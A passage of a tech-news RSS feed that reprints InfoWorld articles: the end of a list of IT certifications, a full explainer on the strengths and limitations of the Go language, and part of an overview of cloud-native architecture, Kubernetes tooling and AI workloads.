<h3 class="wp-block-heading">Certified Secure Software Lifecycle Professional (CSSLP)</h3>



<p class="wp-block-paragraph">This certification, from ISC2, focuses on secure software development practices. It recognizes leading application security skills and demonstrates advanced technical skills and knowledge needed for authentication, authorization, and auditing throughout the software development lifecycle.</p>



<h3 class="wp-block-heading">Databricks Certified Machine Learning Professional</h3>



<p class="wp-block-paragraph">Professionals learn about the latest data and AI techniques and how they can use the Databricks Data Intelligence Platform to build a variety of solutions across data engineering, data warehousing, data science, and AI.</p>



<h3 class="wp-block-heading">Professional Cloud Architect</h3>



<p class="wp-block-paragraph">This certification from Google assesses the ability to design and plan a cloud solution architecture, manage and provision the cloud solution infrastructure, design for security and compliance, analyze and optimize technical and business processes manage implementations of cloud architecture, and ensure solution and operations reliability.</p>



<h3 class="wp-block-heading">Terraform Associate</h3>



<p class="wp-block-paragraph">This certification from HashiCorp is for cloud engineers specializing in operations, IT, or development who know the basic concepts and skills associated with Terraform. It validates foundational skills in using <a href="https://www.infoworld.com/article/3893387/how-terraform-is-evolving-infrastructure-as-code.html">Terraform</a> for <a href="https://www.infoworld.com/article/2259359/what-is-infrastructure-as-code-automating-your-infrastructure-builds.html">infrastructure as code</a> development.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What’s the Go language really good for?]]></title>
<description><![CDATA[Over its more than 15 years in the wild, Google’s Go programming language has evolved from a curiosity for alpha geeks to the battle-tested programming language behind some of the world’s most important cloud-native software projects.



If you’ve ever wondered why Go is the language of choice fo...]]></description>
<link>https://tsecurity.de/de/3665677/ai-nachrichten/whats-the-go-language-really-good-for/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665677/ai-nachrichten/whats-the-go-language-really-good-for/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:43 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Over its more than 15 years in the wild, Google’s <a href="https://www.infoworld.com/article/2255834/go-tutorial-get-started-with-google-go.html">Go programming language</a> has evolved from a curiosity for alpha geeks to the battle-tested programming language behind some of the world’s most important <a href="https://www.infoworld.com/article/2255318/what-is-cloud-native-the-modern-way-to-develop-software.html">cloud-native</a> software projects.</p>



<p class="wp-block-paragraph">If you’ve ever wondered why Go is the language of choice for projects like <a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Docker</a> and <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-your-next-application-platform.html">Kubernetes</a>, this article is for you. We’ll discuss Go’s defining characteristics and how it differs from other programming languages. You will also learn what kinds of projects Go is best suited for, including the state of <a href="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html">Go development for AI-powered tools</a>. We’ll conclude with an overview of Go’s feature set, some limitations of the language, and where it may be going from here.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/2255834/go-tutorial-get-started-with-google-go.html">Golang tutorial: Get started with the Go language</a>.</strong></p>



<h2 class="wp-block-heading">Go is small and simple</h2>



<p class="wp-block-paragraph">Go, or <a href="https://go.dev/doc/faq#go_or_golang">Golang</a> as it’s often called, was created by Google employees—chiefly longtime Unix guru and Google distinguished engineer Rob Pike—but it’s not strictly speaking a “Google project.” Rather, Go is a community-developed <a href="https://www.infoworld.com/article/2262355/what-is-open-source-software-open-source-and-foss-explained.html">open source</a> project, spearheaded by leadership with strong opinions about how Go should be used and the direction the language should take.</p>



<p class="wp-block-paragraph">Go is meant to be easy to learn and straightforward to use, with syntax that is simple to read and understand. Go does not have a large feature set, especially when compared to languages like <a href="https://www.infoworld.com/article/2338049/c-23-language-standard-declared-feature-complete.html">C++</a>. Go’s syntax is reminiscent of <a href="https://www.infoworld.com/article/2261151/why-the-c-programming-language-still-rules.html">C</a>, making it relatively easy for longtime C developers to learn. That said, many features of Go, especially its <a href="https://www.infoworld.com/article/2255834/go-tutorial-get-started-with-google-go.html">concurrency and functional programming features</a>, harken back to languages like Erlang.</p>



<p class="wp-block-paragraph">As a C-like language for building and maintaining cross-platform enterprise applications of all sorts, <a href="https://www.infoworld.com/article/2514123/8-reasons-developers-love-go-and-8-reasons-they-dont.html">Go has much in common with Java</a>. And as a means for enabling rapid development of code that might run anywhere, you could draw a parallel between Go and <a href="https://www.infoworld.com/article/2253770/what-is-python-powerful-intuitive-programming.html">Python</a>, though the differences outweigh the similarities.</p>



<p class="wp-block-paragraph">The <a href="https://go.dev/doc">Go documentation</a> describes Go as “a fast, statically typed, compiled language that feels like a dynamically typed, interpreted language.” Even a large Go program will compile in a matter of seconds. Plus, Go avoids much of the overhead of C-style include files and libraries.</p>



<h2 class="wp-block-heading">Advantages of the Go language</h2>



<p class="wp-block-paragraph">Go is a versatile, convenient, fast, portable, interoperable, and widely supported modern language. These characteristics have helped to make it a top choice for large-scale development projects. Let’s look more closely at each of these positive qualities of Go.</p>



<h3 class="wp-block-heading">Go is versatile and convenient</h3>



<p class="wp-block-paragraph">Go has been compared to interpreted languages like <a href="https://www.infoworld.com/article/2254260/how-to-get-started-with-python.html">Python</a> in its ability to satisfy many common programming needs. Some of this functionality is built into the language itself, such as goroutines for concurrency and thread-like behavior, while additional capabilities are available in Go standard library packages, like the <a href="https://golang.org/pkg/net/http/">http package</a>. Like Python, Go provides automatic memory management capabilities including <a href="https://www.infoworld.com/article/2337816/what-is-garbage-collection-automated-memory-management-for-your-programs.html">garbage collection</a>.</p>



<p class="wp-block-paragraph">Unlike interpreted languages, however, Go code compiles to a fast-running native binary. And unlike C or C++, Go compiles extremely fast—fast enough to make working with Go feel more like working with an interpreted language than a compiled one. Further, the Go build system is less complex than those of other compiled languages. It takes few steps and little bookkeeping to build and run a Go project.</p>



<h3 class="wp-block-heading">Go is faster than many other languages</h3>



<p class="wp-block-paragraph">Go binaries run more slowly than their C counterparts, but the difference in speed is negligible for most applications. Go performance is as good as C for the vast majority of work, and generally much faster than other languages known for speed of development—including <a href="https://www.infoworld.com/article/2263137/what-is-javascript-the-full-stack-programming-language.html">JavaScript</a>, <a href="https://www.infoworld.com/article/2253770/what-is-python-powerful-intuitive-programming.html">Python</a>, and <a href="https://www.infoworld.com/article/2337962/whatever-happened-to-ruby.html">Ruby</a>.</p>



<h3 class="wp-block-heading">Go is portable and interoperable</h3>



<p class="wp-block-paragraph">Executables created with the Go toolchain can stand alone, with no default external dependencies. The Go toolchain is available for a wide variety of operating systems and hardware platforms, and can be used to compile binaries across platforms. What’s more, Go delivers all of the above without sacrificing access to the underlying system. Go programs can talk to external C libraries or make native system calls. In <a href="https://www.infoworld.com/article/2257241/why-you-should-use-docker-and-oci-containers.html">Docker</a>, for instance, Go interacts with low-level Linux functions, cgroups, and namespaces to work container magic.</p>



<h3 class="wp-block-heading">Go is widely supported</h3>



<p class="wp-block-paragraph">The Go toolchain is freely available as a Linux, macOS, or Windows binary, or as a Docker container. Go is included by default in many popular Linux distributions, such as Red Hat Enterprise Linux and Fedora, making it somewhat easier to deploy Go source to those platforms. Support for Go is also strong across many third-party development environments, from Microsoft’s <a href="https://www.infoworld.com/article/2335960/what-is-visual-studio-code-microsofts-extensible-code-editor.html">Visual Studio Code</a> to ActiveState’s <a href="https://www.infoworld.com/article/2250631/review-7-python-ides-compared.html">Komodo IDE</a>.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/2514123/8-reasons-developers-love-go-and-8-reasons-they-dont.html">8 reasons developers love Go—and 8 reasons they don’t</a>.</strong></p>



<h2 class="wp-block-heading">Optimal use cases for the Go language</h2>



<p class="wp-block-paragraph">No language is suited to every job, but some languages are suited to more jobs than others. Go shines brightest in cloud-native development projects, distributed network services, and for developing utilities and stand-alone tools. Let’s consider the qualities that make Go especially well-suited to each of these project types.</p>



<h3 class="wp-block-heading">Cloud-native development</h3>



<p class="wp-block-paragraph">Go’s concurrency and networking features, and its high degree of portability, make it well-suited for building cloud-native apps. In fact, Go was used to build several cornerstones of cloud-native computing including <a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Docker</a>, <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-your-next-application-platform.html">Kubernetes</a>, and <a href="https://www.infoworld.com/article/2258313/what-is-istio-the-kubernetes-service-mesh-explained.html">Istio</a>.</p>



<h3 class="wp-block-heading">Distributed network services</h3>



<p class="wp-block-paragraph">Network applications live and die by concurrency, and Go’s native concurrency features—<a href="https://www.infoworld.com/article/2255834/go-tutorial-get-started-with-google-go.html">goroutines</a> and <a href="https://www.infoworld.com/article/2255834/go-tutorial-get-started-with-google-go.html">channels</a>, mainly—are well suited for such work. Consequently, many Go projects are for networking, distributed functions, and cloud services. These include <a href="https://github.com/go-goyave/goyave">APIs</a>, <a href="https://github.com/mholt/caddy">web servers</a>, <a href="https://github.com/claygod/microservice">Kubernetes-ready frameworks for microservices</a>, and much more.</p>



<h3 class="wp-block-heading">Utilities and standalone tools</h3>



<p class="wp-block-paragraph">Go programs compile to binaries with minimal external dependencies. That makes them ideally suited to creating utilities and other tools, because they launch quickly and can be readily packaged up for redistribution. One example is an <a href="https://goteleport.com/">access server called Teleport</a>, which can be deployed on servers quickly by compiling it from source or downloading a prebuilt binary.</p>



<h2 class="wp-block-heading">Limitations of the Go language</h2>



<p class="wp-block-paragraph">Now let’s consider some of the limitations of Go. For one, it omits many language features developers may desire. It also packs everything into its binaries, so Go programs can be large. Furthermore, <a href="https://www.infoworld.com/article/4041753/go-language-previews-performance-boosting-garbage-collector.html">Go’s garbage collection mechanism</a> delivers automatic memory management at the cost of absolute performance. The language also lacks a standard toolkit for building GUIs, and it is unsuited to systems programming.</p>



<p class="wp-block-paragraph">Let’s look at each of these issues in detail.</p>



<h3 class="wp-block-heading">Go omits many desirable language features</h3>



<p class="wp-block-paragraph">Go’s opinionated set of features draws both praise and criticism. Go is designed to err on the side of being small and easy to understand, with certain features deliberately omitted. The result is that some features that are commonplace in other languages simply aren’t available in Go. This is purposeful, but it’s still a drawback for some types of projects.</p>



<p class="wp-block-paragraph">One thing Go omits that you will find in other languages is <em>macros</em>, commonly defined as the ability to generate program code at compile time. C, C++, and (the rising star) <a href="https://www.infoworld.com/article/2255250/what-is-rust-safe-fast-and-easy-software-development.html">Rust</a> all have macro systems. Go does not have macros, or at least not of the same variety as those languages. What Go does have is a tool command, <code>go generate</code>, which looks for magic comments in Go source and executes them. This can be used to generate Go source code, or even run other commands, but its main use is to programmatically generate code, usually as a precursor to the build process. (Technical blogger Eli Bendersky <a href="https://eli.thegreenplace.net/2021/a-comprehensive-guide-to-go-generate/">explains the ‘go generate’ command in detail</a>.)</p>



<p class="wp-block-paragraph">Another longstanding complaint with Go was, until recently, the lack of generic functions, which allow a function to accept many different types of variables. Go’s development team held out against adding generics to the language for many years because they wanted a syntax and set of behaviors that complemented the rest of Go. But as of <a href="https://tip.golang.org/doc/go1.18">Go 1.18</a>, released in early 2022, the language <a href="https://www.infoworld.com/article/2271612/get-started-with-generics-in-go.html">includes a syntax for generics</a>. Because <code>go generate</code> and its code-generation abilities emerged as one possible way to partially address the lack of generics, this functionality is no longer as commonly used in Go.</p>



<p class="wp-block-paragraph">The fact is that Go adds major language features rarely, and only after much consideration. This works to preserve broad compatibility across versions, but it comes at the cost of slower innovation.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/3849417/what-you-need-to-know-about-go-rust-and-zig.html">What you need to know about Go, Rust, and Zig</a>.</strong></p>



<h3 class="wp-block-heading">Go’s binaries are large</h3>



<p class="wp-block-paragraph">Another potential downside to Go is the size of the generated binaries. Go binaries are statically compiled by default, meaning that everything needed at runtime is included in the binary image. This approach simplifies the build and deployment process, but at the cost of a simple “Hello, world!” weighing in at around 1.5MB on 64-bit Windows. The Go team has been <a href="https://blog.golang.org/go1.7-binary-size">working to reduce the size of those binaries</a> with each successive release. It is also possible to <a href="https://blog.filippo.io/shrink-your-go-binaries-with-this-one-weird-trick/">shrink Go binaries with compression</a> or by <a href="https://jamescun.com/golang/binary-size/">removing Go’s debug information</a>. This last option may work better for standalone distributed apps than for cloud or network services, where having debug information is useful if a service fails in place.</p>



<h3 class="wp-block-heading">Go’s garbage collection is resource hungry</h3>



<p class="wp-block-paragraph">Yet another touted feature of Go, automatic memory management, can be seen as a drawback, as garbage collection requires a certain amount of processing overhead. By design, Go <a href="https://golang.org/doc/faq#garbage_collection">doesn’t provide manual memory management</a>, and garbage collection in Go has been criticized for not dealing well with the kinds of memory loads that appear in enterprise applications.</p>



<p class="wp-block-paragraph">That said, each new version of Go seems to improve the memory management features. For example, Go 1.8 brought <a href="https://golang.org/doc/go1.8#gc">significantly shorter lag times for garbage collection</a>, and <a href="https://www.infoworld.com/article/4041753/go-language-previews-performance-boosting-garbage-collector.html">Go 1.25</a> introduced a new, experimental garbage collector. While Go developers can use manual memory allocation in a C extension, or by way of a <a href="https://github.com/joetifa2003/mm-go">third-party manual memory management library</a>, most prefer native solutions.</p>



<h3 class="wp-block-heading">Go doesn’t have a standard GUI toolkit</h3>



<p class="wp-block-paragraph">Most Go applications are command-line tools or network services. That said, various projects are working to bring rich GUIs for Go applications. There are bindings for the <a href="https://mattn.github.io/go-gtk/">GTK</a> and <a href="https://github.com/gotk3/gotk3">GTK3</a> frameworks. Another project is intended to provide <a href="https://github.com/richardwilkes/unison">platform-native UIs</a> across platforms, although it focuses on Go 1.24 forward only. But no clear winner or safe long-term bet has emerged in this space. Also, because Go is platform-independent by design, it is unlikely any project in this vein will become a part of the standard package set.</p>



<h3 class="wp-block-heading">You shouldn’t use Go for systems programming</h3>



<p class="wp-block-paragraph">Finally, although Go can talk to native system functions, it was not designed for developing low-level system components such as kernels, device drivers, or embedded systems. After all, the Go runtime and the garbage collector for Go applications are dependent on the underlying operating system. (Developers interested in a cutting-edge language for that kind of work might look into using <a href="https://www.infoworld.com/article/2255250/what-is-rust-safe-fast-and-easy-software-development.html">Rust</a>.)</p>



<h2 class="wp-block-heading">The future of the Go language</h2>



<p class="wp-block-paragraph">Go’s development is turning more toward the wants and needs of its developer base, with Go’s minders changing the language to better accommodate this audience rather than leading by stubborn example. A case in point is generics, which were finally added to the language after much deliberation about the best way to do so.</p>



<p class="wp-block-paragraph">The <a href="https://www.infoworld.com/article/2336812/go-language-shines-for-ai-powered-workloads-survey-says.html">2024 Go Developer Survey</a> found developers were overall satisfied with Go. Challenges that surfaced were generally due to the verbosity of error handling, missing or immature frameworks, and using Go’s type system—areas ripe for future development.</p>



<p class="wp-block-paragraph">Like most languages, Go has gravitated to a core set of use cases over time, finding its niche in network services. In the future, Go is likely to continue expanding its hold there. Other use cases cited in the developer survey include creating APIs or RPC services (74% of respondents), followed by CLI applications (63%), web services (45%), libraries/frameworks (44%), automation (39%), and data processing (37%). While only 4% of respondents mentioned using Go to develop <a href="https://www.infoworld.com/artificial-intelligence/">AI technologies</a>, those who did reported that <a href="https://www.infoworld.com/article/2336812/go-language-shines-for-ai-powered-workloads-survey-says.html">Go was a strong platform for running AI-powered workloads in production</a>. For those wanting to develop ML/AI with Go, lack of tooling (23%) and the fact that Python is the default choice for such work (16%) topped the reasons why.</p>



<p class="wp-block-paragraph">It remains to be seen how far Go’s speed and development simplicity will take it into other use cases, especially those dominated by other languages and their existing use cases. Rust covers <a href="https://www.infoworld.com/article/2255250/what-is-rust-safe-fast-and-easy-software-development.html">safe and fast systems programming</a> (a space Go is unlikely to enter); Python is still a common default for <a href="https://www.infoworld.com/article/2253770/what-is-python-powerful-intuitive-programming.html">ML/AI, prototyping, automation, and glue code</a>; and Java remains a stalwart for <a href="https://www.infoworld.com/java">enterprise applications</a>.</p>



<p class="wp-block-paragraph">But Go’s future as a major programming language is already assured—certainly in the cloud, where the speed and simplicity of Go ease the development of scalable infrastructure that can be maintained over the long run.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/3607388/go-language-evolving-for-future-hardware-ai-workloads.html">Go language evolving for future hardware, AI workloads</a>.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloud native explained: How to build scalable, resilient applications]]></title>
<description><![CDATA[What is cloud native? Cloud native defined



The term “cloud-native computing” encompasses the modern approach to building and running software applications that exploit the flexibility, scalability, and resilience of cloud computing. The phrase is a catch-all that encompasses not just the speci...]]></description>
<link>https://tsecurity.de/de/3665670/ai-nachrichten/cloud-native-explained-how-to-build-scalable-resilient-applications/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665670/ai-nachrichten/cloud-native-explained-how-to-build-scalable-resilient-applications/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:33 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h2 class="wp-block-heading"><strong>What is cloud native? Cloud native defined</strong></h2>



<p class="wp-block-paragraph">The term “cloud-native computing” encompasses the modern approach to building and running software applications that exploit the flexibility, scalability, and resilience of cloud computing. The phrase is a catch-all that encompasses not just the specific architecture choices and environments used to build applications for the public cloud, but also the software engineering techniques and philosophies used by cloud developers.</p>



<p class="wp-block-paragraph">The <a href="https://www.cncf.io/">Cloud Native Computing Foundation</a> (CNCF) is an open source organization that hosts many important cloud-related projects and helps set the tone for the world of cloud development. The CNCF offers its own definition of cloud native:</p>



<p class="wp-block-paragraph"><em>Cloud native practices empower organizations to develop, build, and deploy workloads in computing environments (public, private, hybrid cloud) to meet their organizational needs at scale in a programmatic and repeatable manner. It is characterized by loosely coupled systems that interoperate in a manner that is secure, resilient, manageable, sustainable, and observable.</em></p>



<p class="wp-block-paragraph"><em>Cloud native technologies and architectures typically consist of some combination of containers, service meshes, multi-tenancy, microservices, immutable infrastructure, serverless, and declarative APIs — this list is not exhaustive.</em></p>



<p class="wp-block-paragraph">This definition is a good start, but as cloud infrastructure becomes ubiquitous, the cloud native world is beginning to spread behind the core of this definition. We’ll explore that evolution as well, and look into the near future of cloud-native computing.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<h2 class="wp-block-heading"><strong>Cloud native architectural principles</strong></h2>



<p class="wp-block-paragraph">Let’s start by exploring the pillars of cloud-native architecture. Many of these technologies and techniques were considered innovative and even revolutionary when they hit the market over the past few decades, but now have become widely accepted across the software development landscape.</p>



<p class="wp-block-paragraph"><strong>Microservices. </strong>One of the huge cultural shifts that made cloud-native computing possible was the move from huge, monolithic applications to <a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">microservices</a>: small, loosely coupled, and independently deployable components that work together to form a cloud-native application. These microservices can be scaled across cloud environments, though (as we’ll see in a moment) this makes systems more complex.</p>



<p class="wp-block-paragraph"><strong>Containers and orchestration. </strong>In could-native architectures, individual microservices are executed inside <em>containers </em>— lightweight, portable virtual execution environments that can run on a variety of servers and cloud platforms. Containers insulate the developers from having to worry about the underlying machines on which their code will execute. That is, all they have to do is write to the container environment. </p>



<p class="wp-block-paragraph">Getting the containers to run properly and communicate with one another is where the complexity of cloud native computing starts to emerge. Initially, containers were created and managed by relatively simple platforms, the most common of which was <a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Docker</a>. But as cloud-native applications got more complex, container orchestration platforms<em> </em>that augmented Docker’s functionality emerged, such as Kubernetes, which allows you to deploy and manage multi-container applications at scale. Kubernetes is critical to cloud native computing as we know it — it’s worth noting that the CNCF was set up as a <a href="https://www.zdnet.com/article/cloud-native-computing-foundation-seeks-to-bring-more-cloud-and-container-unity/">spinoff of the Linux Foundation on the same day that Kubernetes 1.0 was announced</a> — and adhering to <a href="https://www.infoworld.com/article/2338688/6-best-practices-to-keep-kubernetes-costs-under-control.html">Kubernetes best practices</a> is an important key to cloud native success. </p>



<p class="wp-block-paragraph"><strong>Open standards and APIs. </strong>The fact that containers and cloud platforms are largely defined by open standards and <a href="https://www.infoworld.com/article/3800992/open-source-trends-for-2025-and-beyond.html">open source technologies</a> is the secret sauce that makes all this modularity and orchestration possible, and <a href="https://www.infoworld.com/article/3529600/how-do-you-govern-a-sprawling-disparate-api-portfolio.html">standardized and documented APIs </a>offer the means of communication between distributed components of a larger application. In theory, anyway, this standardization means that every component should be able to communicate with other components of an application without knowing about their inner workings, or about the inner workings of the various platform layers on which everything operates.</p>



<p class="wp-block-paragraph"><strong>DevOps, agile methodologies, and infrastructure as code. </strong>Because cloud-native applications exist as a series of small, discrete units of functionality, cloud-native teams can build and update them using agile philosophies like <a href="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html">DevOps</a>, which promotes <a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">rapid, iterative CI/CD development</a>. This enables teams to deliver business value more quickly and more reliably.</p>



<p class="wp-block-paragraph">The virtualized nature of cloud environments also make them great candidates for <a href="https://www.infoworld.com/article/2259359/what-is-infrastructure-as-code-automating-your-infrastructure-builds.html">infrastructure as code</a> (IaC), a practice in which teams use tools like <a href="https://developer.hashicorp.com/terraform/intro">Terraform</a>, <a href="https://www.pulumi.com/">Pulumi</a>, and <a href="https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/Welcome.html">AWS CloudFormation</a>, to manage infrastructure declaratively and version those declarations just like application code. IaC boosts automation, repeatability, and resilience across environments—all big advantages in the cloud world. IaC also goes hand-in-hand with the concept of <em>immutable infrastructure</em>—the idea that, once deployed, infastructure-level entities like virtual machines, containers, or network appliances don’t change, which makes them easier to manage and secure. IaC stores declarative configuration code in version control, which creates an audit log of any changes.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/04/5_things_cloud_native.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Chart listing five things to love and five things to fear when considiering cloud native" class="wp-image-3970036" width="1024" height="472" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>There’s a lot to love about cloud-native architectures, but there are also several things to be wary of when considering it.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<h2 class="wp-block-heading"><strong>How the cloud-native stack is expanding</strong></h2>



<p class="wp-block-paragraph">As cloud-native development becomes the norm, the cloud-native ecosystem is expanding; the CNCF maintains a graphical representation of what it calls the  <a href="https://landscape.cncf.io/">cloud native landscape</a> that hammers home to expansive and bewildering variety of products, services, and open source projects that contribute to (and seek to profit from) to cloud-native computing. And there are a number of areas where new and developing tools are complicating the picture sketched out by the pillars we discussed above.   </p>



<p class="wp-block-paragraph"><strong>An expanding Kubernetes ecosystem.</strong> <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes </a>is complex, and teams now rely on an <a href="https://www.infoworld.com/article/2265338/13-tools-that-make-kubernetes-better.html">entire ecosystem of projects </a>to get the most out of it: <a href="https://www.infoworld.com/article/2264445/helm-3-package-manager-arrives-for-kubernetes.html">Helm</a> for packaging, <a href="https://argo-cd.readthedocs.io/en/stable/">ArgoCD </a>for GitOps-style deployments, and <a href="https://kustomize.io/">Kustomize </a>for configuration management. And just as Kubernetes augmented Docker for enterprise-scale deployments. Kubernetes itself has been augmented and expanded by <a href="https://www.infoworld.com/article/2261159/what-is-a-service-mesh-easier-container-networking.html">service mesh</a> offerings like <a href="https://istio.io/">Istio </a>and <a href="https://linkerd.io/">Linkerd</a><strong>, </strong>which offer fine-grained traffic control and improved security</p>



<p class="wp-block-paragraph"><strong>Observability needs. </strong>The complex and distributed world of cloud-native computing requires in-depth <a href="https://www.infoworld.com/article/2262666/what-is-observability-software-monitoring-on-steroids.html">observability</a> to ensure that developers and admins have a handle on what’s happening with their applications. <a href="https://www.infoworld.com/article/2337343/what-observability-means-for-cloud-operations.html">Cloud-native observability</a> uses distributed tracing and aggregated logs to provide deep insight into performance and reliability. Tools like <a href="https://www.infoworld.com/article/2246709/prometheus-unbound-open-source-cloud-monitoring.html">Prometheus</a>, <a href="https://www.infoworld.com/article/2337267/grafana-shining-a-light-into-kubernetes-clusters.html">Grafana</a>, <a href="https://www.cncf.io/projects/jaeger/">Jaeger</a>, and <a href="https://opentelemetry.io/">OpenTelemetry</a> support comprehensive, real-time observability across the stack.</p>



<p class="wp-block-paragraph"><strong>Serverless computing.  </strong><a href="https://www.infoworld.com/article/2261831/what-is-serverless-serverless-computing-explained.html">Serverless computing</a>, particularly in its function-as-a-service guise, offers to strip needed compute resources down to their bare minimum, with functions running on service provider clouds using exactly as much as they need and no more. Because these services can be exposed as endpoints via APIs, they are increasingly integrated into distributed applications, operating side-by-side with functionality provided by containerized microservices. Watch out, though: the big FaaS providers (<a href="https://www.infoworld.com/article/2265860/aws-lambda-tutorial-get-started-with-serverless-computing.html">Amazon</a>, <a href="https://www.infoworld.com/article/2255377/how-to-work-with-azure-functions-in-csharp.html">Microsoft</a>, and <a href="https://www.infoworld.com/article/2243861/google-takes-aims-at-aws-lambda-with-cloud-functions.html">Google</a>) would love to lock you in to their ecosystems.  </p>



<p class="wp-block-paragraph"><strong>FinOps. </strong><a href="http://infoworld.com/article/2238873/what-is-cloud-computing.html">Cloud computing</a> was initially billed as a way to cut costs — no need to pay for an in-house data center that you barely use — but in practice it replaces capex with opex, and sometimes you can run up truly shocking cloud service bills if you aren’t careful. Serverless computing is one way to cut down on those costs, but financial operations, or <a href="https://www.cio.com/article/416337/what-is-finops-your-guide-to-cloud-cost-management.html">FinOps</a>, is a more systematic discipline that aims to aligns engineering, finance, and product to optimize cloud spending. <a href="https://www.infoworld.com/article/2338592/6-finops-best-practices-to-reduce-cloud-costs.html">FinOps best practices</a> make use of those observability tools to best determine what departments and applications are eating up resources.</p>



<h2 class="wp-block-heading"><strong>How cloud-native architecture is adapting to AI workloads</strong></h2>



<p class="wp-block-paragraph">Enterprises deploy larger AI models and make use of more and more real-time inference services. That’s putting demands on cloud-native systems and forcing them to adapt to remain scalable and reliable.</p>



<p class="wp-block-paragraph">For instance, organizations are <a href="https://www.infoworld.com/article/4057189/the-rise-of-ai-ready-private-clouds.html">re-engineering cloud environments</a> around GPU-accelerated clusters, low-latency networking, and predictable orchestration. These needs align with established cloud-native patterns: containers package AI services consistently, while Kubernetes provides resilient scheduling and horizontal scale for inference workloads that can spike without warning.</p>



<p class="wp-block-paragraph">Kubernetes itself is <a href="https://www.infoworld.com/article/4045563/evolving-kubernetes-for-generative-ai-inference.html">changing to better support AI inference</a>, adding hardware-aware scheduling for GPUs, model-specific autoscaling behavior, and deeper observability into inference pipelines. These enhancements make Kubernetes a more natural platform for serving generative AI workloads.</p>



<p class="wp-block-paragraph">AI’s resource demands are amplifying traditional cloud-native challenges. Observability becomes more complex as inference paths span GPUs, CPUs, vector databases, and distributed storage. <a href="https://www.cio.com/article/416337/what-is-finops-your-guide-to-cloud-cost-management.html">FinOps</a> teams contend with cost volatility from training and inference bursts. And security teams must track new risks around model provenance, data access, and supply-chain integrity.</p>



<h2 class="wp-block-heading"><strong>Application frameworks for building distributed cloud-native apps</strong></h2>



<p class="wp-block-paragraph">Microsoft’s Aspire is one of the most visible examples of a shift towards application frameworks to simplify how teams build distributed systems. Opinionated frameworks like Aspire provide structure, observability, and integration out of the box so developer don’t need to stitch together containers, microservices, and orchestration tooling by hand.</p>



<p class="wp-block-paragraph">Aspire in particular is a <a href="https://www.infoworld.com/article/4023638/taking-net-aspire-for-a-spin.html">prescriptive framework for cloud-native applications</a>, bundling containerized services, environment configuration, health checks, and observability into a unified development model. Aspire provides defaults for service-to-service communication, configuration, and deployment, along with a built-in dashboard for visibility across distributed components.</p>



<p class="wp-block-paragraph">While Aspire was originally aligned with Microsoft’s .<a href="https://www.infoworld.com/article/2264488/what-is-the-net-framework-microsofts-answer-to-java.html">NET platform</a>,Redmond now sees it as having a<strong>  </strong><a href="https://www.infoworld.com/article/4085051/aspires-polyglot-future.html?utm_source=chatgpt.com">polyglot future</a>. This positions Aspire as part of a broader trend: frameworks that help teams build cloud-native, service-oriented systems without being locked into a single language ecosystem. Several other frameworks are gaining traction: Dapr provides a portable runtime that abstracts many of the plumbing tasks in cloud-native distributed applications, and Orleans offers an actor-model-based framework for large-scale systems in the .NET world, and Akka gives JVM teams a mature, reactive toolkit for elastic, resilient services.</p>



<h2 class="wp-block-heading"><strong>Frameworks and tools in the expanding cloud-native ecosystem</strong></h2>



<p class="wp-block-paragraph">While frameworks like Aspire simplify how developers compose and structure distributed applications, most cloud-native systems still depend on a broader ecosystem of platforms and operational tooling. This deeper layer is where much of the complexity—and innovation—of cloud-native computing lives, particularly as Kubernetes continues to serve as the industry’s control plane for modern infrastructure.</p>



<p class="wp-block-paragraph">Kubernetes provides the core abstractions for deploying and orchestrating containerized workloads at scale. Managed distributions such as Google Kubernetes Engine (GKE), Amazon EKS, <a href="https://www.infoworld.com/article/4058764/smoother-kubernetes-sailing-with-aks-automatic.html">Azure AKS</a>, and Red Hat OpenShift build on these primitives with security, lifecycle automation, and enterprise support. Platform vendors are increasingly automating cluster operations—upgrades, scaling, remediation—to reduce the operational burden on engineering teams.</p>



